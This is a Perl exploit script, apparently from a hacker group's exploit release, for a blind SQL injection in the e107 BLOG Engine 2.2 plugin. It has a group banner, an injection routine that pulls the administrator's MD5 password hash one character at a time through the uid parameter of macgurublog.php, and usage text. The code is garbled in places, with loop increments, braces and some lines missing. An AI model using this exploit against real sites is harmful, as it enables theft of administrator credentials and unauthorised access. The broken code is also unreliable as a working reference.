e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

     # e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit #
     # ..::virangar security team::.. #
     # www.virangar.net #
     # C0d3d BY:virangar security team ( hadihadi ) #
     #special tnx to: #
     #MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #
     #& all virangar members & all hackerz #
     # my lovely friends hadi_aryaie2004 & arash(imm02tal) #
     # ..:::Young Iranina Hackerz::.. #
     #[-] note: becuse e107 using diffrent prefix/table names may it's not work good,but i wrote it for default mod ;)
     #this code is for english e107's only,if you want work on other languages,you can edit line 67;) use HTTP::Request;
     use LWP::UserAgent; if (@ARGV != 1){
     } $host = $ARGV[0]; print "\n md5 Password:\r\n";
     print "\n[ ]Done\n";
     sub halghe {
     for($i = 1; $i <= 32; $i ){
     $f = 0;
     $n = 48;
     while(!$f && $n <= 57)
     if(&inject($host, $i, $n,)){
     $f = 1;
     syswrite(STDOUT, chr($n), 1);
     $n ;
     while(!$f && $n <= 102)
     if(&inject($host, $i, $n,)){
     $f = 1;
     syswrite(STDOUT, chr($n), 1);
     $n ;
     sub inject {
     my $site = $_[0];
     my $a = $_[1];
     my $b = $_[2]; $col = "user_password"; $attack= "$site"." and substring((select "."$col"." from e107_user where user_id=1 limit 0,1),"."$a".",1)=char("."$b".")/*"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
     $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
     $req = $b->request(HTTP::Request->new(GET=>$attack));
     $res = $req->content; if ($res !~ /The user has hidden their blog./i){
     return 1;
     } }
     sub header {
     print qq{
     # e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit #
     # (just for english e107's) #
     # www.virangar.net #
     # Useage: perl $0 Host #
     # #
     # Host: full patch to macgurublog.php uid (dont forget http://) #
     # #
     # Example: #
     # perl $0 http://site/macgurublog_menu/macgurublog.php?uid=5 #
     # #